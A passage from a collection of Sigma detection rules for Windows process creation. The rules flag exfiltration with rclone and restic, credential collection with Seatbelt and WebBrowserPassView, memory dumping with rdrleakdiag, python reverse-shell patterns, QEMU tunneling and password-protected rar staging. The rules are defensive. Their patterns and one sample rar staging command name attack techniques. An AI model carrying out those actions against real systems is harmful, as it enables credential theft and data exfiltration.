    "content": "title: PUA - Radmin Viewer Utility Execution\nid: 5817e76f-4804-41e6-8f1d-5fa0b3ecae2d\nstatus: test\ndescription: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md\n    - https://www.radmin.fr/\nauthor: frack113\ndate: 2022-01-22\nmodified: 2023-12-11\ntags:\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1072\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: 'Radmin Viewer'\n        - Product: 'Radmin Viewer'\n        - OriginalFileName: 'Radmin.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_rcedit_execution.yml",
    "content": "title: PUA - Potential PE Metadata Tamper Using Rcedit\nid: 0c92f2e6-f08f-4b73-9216-ecb0ca634689\nstatus: test\ndescription: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.\nreferences:\n    - https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe\n    - https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915\n    - https://github.com/electron/rcedit\nauthor: Micah Babinski\ndate: 2022-12-11\nmodified: 2023-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\n    - attack.t1036\n    - attack.t1027.005\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\rcedit-x64.exe'\n              - '\\rcedit-x86.exe'\n        - Description: 'Edit resources of exe'\n        - Product: 'rcedit'\n    selection_flags:\n        CommandLine|contains: '--set-' # Covers multiple edit commands such as \"--set-resource-string\" or \"--set-version-string\"\n    selection_attributes:\n        CommandLine|contains:\n            - 'OriginalFileName'\n            - 'CompanyName'\n            - 'FileDescription'\n            - 'ProductName'\n            - 'ProductVersion'\n            - 'LegalCopyright'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the tool by administrators or users to update metadata of a binary\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_rclone_execution.yml",
    "content": "title: PUA - Rclone Execution\nid: e37db05d-d1f9-49c8-b464-cee1a4b11638\nrelated:\n    - id: a0d63692-a531-4912-ad39-4393325b2a9c\n      type: obsolete\n    - id: cb7286ba-f207-44ab-b9e6-760d82b84253\n      type: obsolete\nstatus: test\ndescription: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc\nreferences:\n    - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware\n    - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a\n    - https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone\n    - https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html\nauthor: Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group\ndate: 2021-05-10\nmodified: 2023-03-05\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_specific_options:\n        CommandLine|contains|all:\n            - '--config '\n            - '--no-check-certificate '\n            - ' copy '\n    selection_rclone_img:\n        - Image|endswith: '\\rclone.exe'\n        - Description: 'Rsync for cloud storage'\n    selection_rclone_cli:\n        CommandLine|contains:\n            - 'pass'\n            - 'user'\n            - 'copy'\n            - 'sync'\n            - 'config'\n            - 'lsd'\n            - 'remote'\n            - 'ls'\n            - 'mega'\n            - 'pcloud'\n            - 'ftp'\n            - 'ignore-existing'\n            - 'auto-confirm'\n            - 'transfers'\n            - 'multi-thread-streams'\n            - 'no-check-certificate '\n    condition: selection_specific_options or all of selection_rclone_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_restic.yml",
    "content": "title: PUA - Restic Backup Tool Execution\nid: 6ddff2e8-ea1a-45d0-8938-93dfc1d67ae7\nstatus: experimental\ndescription: |\n    Detects the execution of the Restic backup tool, which can be used for data exfiltration.\n    Threat actors may leverage Restic to back up and exfiltrate sensitive data to remote storage locations, including cloud services.\n    If not legitimately used in the enterprise environment, its presence may indicate malicious activity.\nreferences:\n    - https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/#exfiltration\n    - https://restic.net/\n    - https://restic.readthedocs.io/en/stable/030_preparing_a_new_repo.html\nauthor: Nounou Mbeiri, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-17\ntags:\n    - attack.exfiltration\n    - attack.t1048\n    - attack.t1567.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_specific:\n        - CommandLine|contains|all:\n              - '--password-file'\n              - 'init'\n              - ' -r '\n        - CommandLine|contains|all:\n              - '--use-fs-snapshot'\n              - 'backup'\n              - ' -r '\n    selection_restic:\n        CommandLine|contains:\n            - 'sftp:'\n            - 'rest:http'\n            - 's3:s3.'\n            - 's3.http'\n            - 'azure:'\n            - ' gs:'\n            - 'rclone:'\n            - 'swift:'\n            - ' b2:'\n        CommandLine|contains|all:\n            - ' init '\n            - ' -r '\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate use of Restic for backup purposes within the organization.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_runxcmd.yml",
    "content": "title: PUA - RunXCmd Execution\nid: 93199800-b52a-4dec-b762-75212c196542\nstatus: test\ndescription: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts\nreferences:\n    - https://www.d7xtech.com/free-software/runx/\n    - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-24\nmodified: 2023-02-14\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_account:\n        CommandLine|contains:\n            - ' /account=system '\n            - ' /account=ti '\n    selection_exec:\n        CommandLine|contains: '/exec='\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use by administrators\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml",
    "content": "title: PUA - Seatbelt Execution\nid: 38646daa-e78f-4ace-9de0-55547b2d30da\nstatus: test\ndescription: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters\nreferences:\n    - https://github.com/GhostPack/Seatbelt\n    - https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-18\nmodified: 2023-02-04\ntags:\n    - attack.discovery\n    - attack.t1526\n    - attack.t1087\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\Seatbelt.exe'\n        - OriginalFileName: 'Seatbelt.exe'\n        - Description: 'Seatbelt'\n        - CommandLine|contains:\n              # This just a list of the commands that will produce the least amount of FP in \"theory\"\n              # Comment out/in as needed in your environment\n              # To get the full list of commands see reference section\n              - ' DpapiMasterKeys'\n              - ' InterestingProcesses'\n              - ' InterestingFiles'\n              - ' CertificateThumbprints'\n              - ' ChromiumBookmarks'\n              - ' ChromiumHistory'\n              - ' ChromiumPresence'\n              - ' CloudCredentials'\n              - ' CredEnum'\n              - ' CredGuard'\n              - ' FirefoxHistory'\n              - ' ProcessCreationEvents'\n              # - ' RDPSessions'\n              # - ' PowerShellHistory'\n    selection_group_list:\n        CommandLine|contains:\n            - ' -group=misc'\n            - ' -group=remote'\n            - ' -group=chromium'\n            - ' -group=slack'\n            - ' -group=system'\n            - ' -group=user'\n            - ' -group=all'\n    selection_group_output:\n        CommandLine|contains: ' -outputfile='\n    condition: selection_img or all of selection_group_*\nfalsepositives:\n    - Unlikely\nlevel: 
high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_system_informer.yml",
    "content": "title: PUA - System Informer Execution\nid: 5722dff1-4bdd-4949-86ab-fbaf707e767a\nrelated:\n    - id: 811e0002-b13b-4a15-9d00-a613fce66e42\n      type: similar\nstatus: test\ndescription: Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations\nreferences:\n    - https://github.com/winsiderss/systeminformer\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-05-08\nmodified: 2024-11-23\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.discovery\n    - attack.defense-evasion\n    - attack.t1082\n    - attack.t1564\n    - attack.t1543\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\SystemInformer.exe'\n        - OriginalFileName: 'SystemInformer.exe'\n        - Description: 'System Informer'\n        - Product: 'System Informer'\n        - Hashes|contains:\n              # Note: add other hashes as needed\n              # 3.0.11077.6550\n              - 'MD5=19426363A37C03C3ED6FEDF57B6696EC'\n              - 'SHA1=8B12C6DA8FAC0D5E8AB999C31E5EA04AF32D53DC'\n              - 'SHA256=8EE9D84DE50803545937A63C686822388A3338497CDDB660D5D69CF68B68F287'\n              - 'IMPHASH=B68908ADAEB5D662F87F2528AF318F12'\n    condition: selection\nfalsepositives:\n    - System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_trufflehog.yml",
    "content": "title: PUA - TruffleHog Execution\nid: 44030449-b0df-4c94-aae1-502359ab28ee\nrelated:\n    - id: d7a650c4-226c-451e-948f-cc490db506aa\n      type: similar\nstatus: experimental\ndescription: |\n    Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously.\n    While it is a legitimate tool, intended for use in CI pipelines and security assessments,\n    It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.\nreferences:\n    - https://github.com/trufflesecurity/trufflehog\n    - https://www.getsafety.com/blog-posts/shai-hulud-npm-attack\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-09-24\ntags:\n    - attack.discovery\n    - attack.credential-access\n    - attack.t1083\n    - attack.t1552.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\trufflehog.exe'\n    selection_cli_platform:\n        CommandLine|contains:\n            - ' docker --image '\n            - ' Git '\n            - ' GitHub '\n            - ' Jira '\n            - ' Slack '\n            - ' Confluence '\n            - ' SharePoint '\n            - ' s3 '\n            - ' gcs '\n    selection_cli_verified:\n        CommandLine|contains: ' --results=verified'\n    condition: selection_img or all of selection_cli_*\nfalsepositives:\n    - Legitimate use of TruffleHog by security teams or developers.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_webbrowserpassview.yml",
    "content": "title: PUA - WebBrowserPassView Execution\nid: d0dae994-26c6-4d2d-83b5-b3c8b79ae513\nstatus: test\ndescription: Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md\nauthor: frack113\ndate: 2022-08-20\nmodified: 2023-02-14\ntags:\n    - attack.credential-access\n    - attack.t1555.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: 'Web Browser Password Viewer'\n        - Image|endswith: '\\WebBrowserPassView.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml",
    "content": "title: PUA - Wsudo Suspicious Execution\nid: bdeeabc9-ff2a-4a51-be59-bb253aac7891\nstatus: test\ndescription: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)\nreferences:\n    - https://github.com/M2Team/Privexec/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-02\nmodified: 2023-02-14\ntags:\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_metadata:\n        - Image|endswith: '\\wsudo.exe'\n        - OriginalFileName: 'wsudo.exe'\n        - Description: 'Windows sudo utility'\n        - ParentImage|endswith: '\\wsudo-bridge.exe'\n    selection_cli:\n        CommandLine|contains:\n            - '-u System'\n            - '-uSystem'\n            - '-u TrustedInstaller'\n            - '-uTrustedInstaller'\n            - ' --ti '\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_python_adidnsdump.yml",
    "content": "title: PUA - Adidnsdump Execution\nid: 26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160\nstatus: test\ndescription: |\n    This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks. Python 3 and python.exe must be installed.\n    Used to query/modify DNS records for Active Directory integrated DNS via LDAP.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump\nauthor: frack113\ndate: 2022-01-01\nmodified: 2023-02-21\ntags:\n    - attack.discovery\n    - attack.t1018\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\python.exe'\n        CommandLine|contains: 'adidnsdump'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml",
    "content": "title: Python Inline Command Execution\nid: 899133d5-4d7c-4a7f-94ee-27355c879d90\nstatus: test\ndescription: Detects execution of python using the \"-c\" flag. This could be used as a way to launch a reverse shell or execute live python code.\nreferences:\n    - https://docs.python.org/3/using/cmdline.html#cmdoption-c\n    - https://www.revshells.com/\n    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-02\nmodified: 2025-10-07\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'python.exe'\n        - Image|endswith:\n              - 'python.exe' # no \\ bc of e.g. ipython.exe\n              - 'python3.exe'\n              - 'python2.exe'\n    selection_cli:\n        CommandLine|contains: ' -c'\n    filter_main_python_1: # Based on baseline\n        ParentImage|startswith:\n            - 'C:\\Program Files\\Python'\n            - 'C:\\Program Files (x86)\\Python'\n        ParentImage|endswith: '\\python.exe'\n        ParentCommandLine|contains: '-E -s -m ensurepip -U --default-pip'\n    filter_main_python_trace: # Based on baseline\n        ParentImage|startswith:\n            - 'C:\\Program Files\\Python'\n            - 'C:\\Program Files (x86)\\Python'\n        CommandLine|contains|all:\n            # CommandLine: \\\"C:\\\\Program Files\\\\Python312\\\\python.exe\\\" -W ignore::DeprecationWarning -c \\\"\\nimport runpy\\nimport sys\\nsys.path = ['C:\\\\\\\\Users\\\\\\\\User\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\tmpdakwn6aj\\\\\\\\pip-23.2.1-py3-none-any.whl'] + sys.path\\nsys.argv[1:] = ['install', '--no-cache-dir', '--no-index', '--find-links', 'C:\\\\\\\\Users\\\\\\\\User\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\tmpdakwn6aj', '--upgrade', 'pip']\\nrunpy.run_module(\\\\\\\"pip\\\\\\\", run_name=\\\\\\\"__main__\\\\\\\", alter_sys=True)\\n\\\n            - '-W ignore::DeprecationWarning'\n            - \"['install', '--no-cache-dir', '--no-index', '--find-links',\"\n            - \"'--upgrade', 'pip'\"\n    filter_optional_vscode:\n        - ParentImage|endswith: '\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n        - ParentImage:\n              - 'C:\\Program Files\\Microsoft VS Code\\Code.exe'\n              - 'C:\\Program Files (x86)\\Microsoft VS Code\\Code.exe'\n    filter_optional_pip:\n        CommandLine|contains|all:\n            - '<pip-setuptools-caller>'\n            - 'exec(compile('\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Python libraries that use a flag starting with \"-c\". Filter according to your environment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_python_pty_spawn.yml",
    "content": "title: Python Spawning Pretty TTY on Windows\nid: 480e7e51-e797-47e3-8d72-ebfce65b6d8d\nrelated:\n    - id: 899133d5-4d7c-4a7f-94ee-27355c879d90\n      type: derived\nstatus: test\ndescription: Detects python spawning a pretty tty\nreferences:\n    - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/\nauthor: Nextron Systems\ndate: 2022-06-03\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith:\n            - 'python.exe' # no \\ bc of e.g. ipython.exe\n            - 'python3.exe'\n            - 'python2.exe'\n    selection_cli_1:\n        CommandLine|contains|all:\n            - 'import pty'\n            - '.spawn('\n    selection_cli_2:\n        CommandLine|contains: 'from pty import spawn'\n    condition: selection_img and 1 of selection_cli_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_qemu_suspicious_execution.yml",
    "content": "title: Potentially Suspicious Usage Of Qemu\nid: 5fc297ae-25b6-488a-8f25-cc12ac29b744\nstatus: test\ndescription: |\n    Detects potentially suspicious execution of the Qemu utility in a Windows environment.\n    Threat actors have leveraged this utility and this technique to achieve network access, as reported by Kaspersky.\nreferences:\n    - https://securelist.com/network-tunneling-with-qemu/111803/\n    - https://www.qemu.org/docs/master/system/invocation.html#hxtool-5\nauthor: Muhammad Faisal (@faisalusuf), Hunter Juhan (@threatHNTR)\ndate: 2024-06-03\ntags:\n    - attack.command-and-control\n    - attack.t1090\n    - attack.t1572\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - '-m 1M' # A VM with just 1MB of RAM is unusable for a real guest, so this is a suspicious flag\n            - '-m 2M'\n            - '-m 3M'\n        CommandLine|contains|all:\n            - 'restrict=off'\n            - '-netdev '\n            - 'connect='\n            - '-nographic' # Also a key indicator; interactive use from a console normally keeps the UI, so this flag is unusual\n    filter_main_normal_usecase:\n        CommandLine|contains:\n            - ' -cdrom ' # Normal usage cases\n            - ' type=virt '\n            - ' -blockdev '\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_query_session_exfil.yml",
    "content": "title: Query Usage To Exfil Data\nid: 53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2\nstatus: test\ndescription: Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use\nreferences:\n    - https://twitter.com/MichalKoczwara/status/1553634816016498688\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-01\nmodified: 2023-01-19\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: ':\\Windows\\System32\\query.exe'\n        CommandLine|contains:\n            - 'session >'\n            - 'process >'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_quickassist_execution.yml",
    "content": "title: QuickAssist Execution\nid: e20b5b14-ce93-4230-88af-981983ef6e74\nstatus: experimental\ndescription: |\n    Detects the execution of Microsoft Quick Assist tool \"QuickAssist.exe\". This utility can be used by attackers to gain remote access.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/\n    - https://www.linkedin.com/posts/kevin-beaumont-security_ive-been-assisting-a-few-orgs-hit-with-successful-activity-7268055739116445701-xxjZ/\n    - https://x.com/cyb3rops/status/1862406110365245506\n    - https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-12-19\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\QuickAssist.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use of Quick Assist in the environment.\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rar_compress_data.yml",
    "content": "title: Files Added To An Archive Using Rar.EXE\nid: 6f3e2987-db24-4c78-a860-b4f4095a7095\nstatus: test\ndescription: Detects usage of \"rar\" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html\nauthor: Timur Zinniatullin, E.M. Anhaus, oscd.community\ndate: 2019-10-21\nmodified: 2023-02-05\ntags:\n    - attack.collection\n    - attack.t1560.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\rar.exe'\n        CommandLine|contains: ' a '\n    condition: selection\nfalsepositives:\n    - Highly likely if rar is a default archiver in the monitored environment.\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rar_compression_with_password.yml",
    "content": "title: Rar Usage with Password and Compression Level\nid: faa48cae-6b25-4f00-a094-08947fef582f\nstatus: test\ndescription: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.\nreferences:\n    - https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/\n    - https://ss64.com/bash/rar.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md\nauthor: '@ROxPinTeddy'\ndate: 2020-05-12\nmodified: 2022-03-16\ntags:\n    - attack.collection\n    - attack.t1560.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_password:\n        CommandLine|contains: ' -hp'\n    selection_other:\n        CommandLine|contains:\n            - ' -m'\n            - ' a '\n    condition: selection_password and selection_other\nfalsepositives:\n    - Legitimate use of Winrar command line version\n    - Other command line tools, that use these flags\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rar_susp_greedy_compression.yml",
    "content": "title: Suspicious Greedy Compression Using Rar.EXE\nid: afe52666-401e-4a02-b4ff-5d128990b8cb\nstatus: test\ndescription: Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes\nreferences:\n    - https://decoded.avast.io/martinchlumecky/png-steganography\nauthor: X__Junior (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2022-12-15\nmodified: 2024-01-02\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    # Example : rar.exe a -m5 -r -y -ta20210204000000 -hp1qazxcde32ws -v2560k Asia1Dpt-PC-c.rar c:\\\\*.doc c:\\\\*.docx c:\\\\*.xls c:\\\\*.xlsx c:\\\\*.pdf c:\\\\*.ppt c:\\\\*.pptx c:\\\\*.jpg c:\\\\*.txt >nul\n    selection_opt_1:\n        - Image|endswith: '\\rar.exe'\n        - Description: 'Command line RAR'\n    selection_opt_2:\n        CommandLine|contains:\n            - '.exe a '\n            - ' a -m'\n    selection_cli_flags:\n        CommandLine|contains|all:\n            - ' -hp' # password\n            - ' -r ' # recursive\n    selection_cli_folders:\n        CommandLine|contains:\n            - ' ?:\\\\\\*.'\n            - ' ?:\\\\\\\\\\*.'\n            - ' ?:\\$Recycle.bin\\'\n            - ' ?:\\PerfLogs\\'\n            - ' ?:\\Temp'\n            - ' ?:\\Users\\Public\\'\n            - ' ?:\\Windows\\'\n            - ' %public%'\n    condition: 1 of selection_opt_* and all of selection_cli_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rasdial_execution.yml",
    "content": "title: Suspicious RASdial Activity\nid: 6bba49bf-7f8c-47d6-a1bb-6b4dece4640e\nstatus: test\ndescription: Detects suspicious process activity related to rasdial.exe\nreferences:\n    - https://twitter.com/subTee/status/891298217907830785\nauthor: juju4\ndate: 2019-01-16\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: 'rasdial.exe'\n    condition: selection\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rdp_enable_or_disable_via_win32_terminalservicesetting_wmi_class.yml",
    "content": "title: RDP Enable or Disable via Win32_TerminalServiceSetting WMI Class\nid: 4b8f6d3a-9c5e-4f2a-a7d8-6b9c3e5f2a8d\nrelated:\n    - id: a2863fbc-d5cb-48d5-83fb-d976d4b1743b\n      type: similar\nstatus: experimental\ndescription: |\n    Detects enabling or disabling of Remote Desktop Protocol (RDP) using alternate methods such as WMIC or PowerShell.\n    In PowerShell one-liner commands, the \"SetAllowTSConnections\" method of the \"Win32_TerminalServiceSetting\" class may be used to enable or disable RDP.\n    In WMIC, the \"rdtoggle\" alias or \"Win32_TerminalServiceSetting\" class may be used for the same purpose.\nreferences:\n    - https://www.trendmicro.com/en_gb/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html\n    - https://github.com/HackTricks-wiki/hacktricks/blob/72f20a3fa26775b932bd819f1824c6377802a768/src/windows-hardening/basic-cmd-for-pentesters.md#firewall\n    - https://github.com/Lifailon/RSA/blob/rsa/Sources/RSA-1.4.1.ps1#L1468\nauthor: Daniel Koifman (KoifSec), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-15\ntags:\n    - attack.lateral-movement\n    - attack.t1021.001\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\wmic.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'wmic.exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli_method:\n        CommandLine|contains:\n            - 'rdtoggle'\n            - 'Win32_TerminalServiceSetting'\n    selection_cli_property:\n        CommandLine|contains: 'SetAllowTSConnections'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate system administrators enabling RDP for remote support\n    - System configuration scripts during deployment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml",
    "content": "title: Process Memory Dump via RdrLeakDiag.EXE\nid: edadb1e5-5919-4e4c-8462-a9e643b02c4b\nrelated:\n    - id: 6355a919-2e97-4285-a673-74645566340d\n      type: obsolete\nstatus: test\ndescription: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory\nreferences:\n    - https://www.pureid.io/dumping-abusing-windows-credentials-part-1/\n    - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/\n    - https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/\n    - https://twitter.com/0gtweet/status/1299071304805560321?s=21\n    - https://news.sophos.com/en-us/2024/06/05/operation-crimson-palace-a-technical-deep-dive\nauthor: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-09-24\nmodified: 2024-08-15\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rdrleakdiag.exe'\n        - OriginalFileName: RdrLeakDiag.exe\n    selection_cli_dump:\n        CommandLine|contains|windash:\n            - '/memdmp'\n            - 'fullmemdmp'\n    selection_cli_output_process:\n        CommandLine|contains|windash:\n            - ' /o ' # Output\n            - ' /p ' # Process\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reagentc_disable_windows_recovery_environment.yml",
